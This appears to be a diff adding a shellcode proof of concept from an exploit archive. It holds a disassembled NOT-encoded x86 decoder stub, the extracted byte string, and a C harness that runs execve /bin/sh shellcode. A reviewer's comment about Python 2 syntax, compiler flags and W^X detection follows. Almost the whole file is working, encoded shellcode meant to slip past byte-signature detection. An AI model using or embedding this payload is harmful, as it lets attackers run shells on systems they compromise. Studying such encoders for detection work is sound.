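+NOT-Decoder: file format elf32-i386
+Disassembly of section .text:
+08048080 <_start>:
+8048080: eb 0c jmp 804808e <call_decoder>
+08048082 <decoder>:
+8048082: 5e pop esi
+8048083: 31 c9 xor ecx,ecx
+8048085: b1 19 mov cl,0x19
+08048087 <decode>:
+8048087: f6 16 not BYTE PTR [esi]
+8048089: 46 inc esi
+804808a: e2 fb loop 8048087 <decode>
+804808c: eb 05 jmp 8048093 <EncodedShellcode>
+0804808e <call_decoder>:
+804808e: e8 ef ff ff ff call 8048082 <decoder>
+08048093 <EncodedShellcode>:
+8048093: ce into
+8048094: 3f aas
+8048095: af scas eax,DWORD PTR es:[edi]
+8048096: 97 xchg edi,eax
+8048097: d0 d0 rcl al,1
+8048099: 8c 97 97 d0 9d 96 mov WORD PTR [edi-0x69622f69],ss
+804809f: 91 xchg ecx,eax
+80480a0: 76 1c jbe 80480be <__bss_start+0x12>
+80480a2: af scas eax,DWORD PTR es:[edi]
+80480a3: 76 1d jbe 80480c2 <__bss_start+0x16>
+80480a5: ac lods al,BYTE PTR ds:[esi]
+80480a6: 76 1e jbe 80480c6 <__bss_start+0x1a>
+80480a8: 4f dec edi
+80480a9: f4 hlt
+80480aa: 32 .byte 0x32
+80480ab: 7f .byte 0x7f
+[+] Extract Shellcode ...
+"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f"
+======================= POC Daniele Votta =======================
+*/
+/* NOT Encoded Execve /bin/sh */
+unsigned char code[] = \
+"\xeb\x0c\x5e\x31\xc9\xb1\x19\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
+int main()
+{
+printf("Shellcode Length: %d\n", strlen(code));
+int (*ret)() = (int(*)())code;
+ret();
+}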
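Review bot: The encoder reproduced in the header comment is Python 2 only — the `print 'Encoded shellcode...'` statements and `bytearray(shellcode)` over a str literal — but nothing says so, and the `#!/usr/bin/python` shebang resolves to Python 3 on current distributions, where it fails to parse; a `# Python 2 only` line next to the shebang, or a note in the Description line, would avoid that. The decoder's `not BYTE PTR [esi]` rewrites the payload in place, so the harness depends on `code[]` being both writable and executable; the file only says `Tested on: i686 GNU/Linux` and omits the gcc flags, which belong next to the `unsigned char code[]` declaration (`-m32 -fno-stack-protector -z execstack`, as 46492.c in this commit documents). That write-then-execute of the same bytes is also worth a sentence in the header from a detection standpoint, since it is what W^X enforcement and memory-behaviour monitors flag. The `%d`/size_t mismatch in the printf is the one already noted on 46491.c.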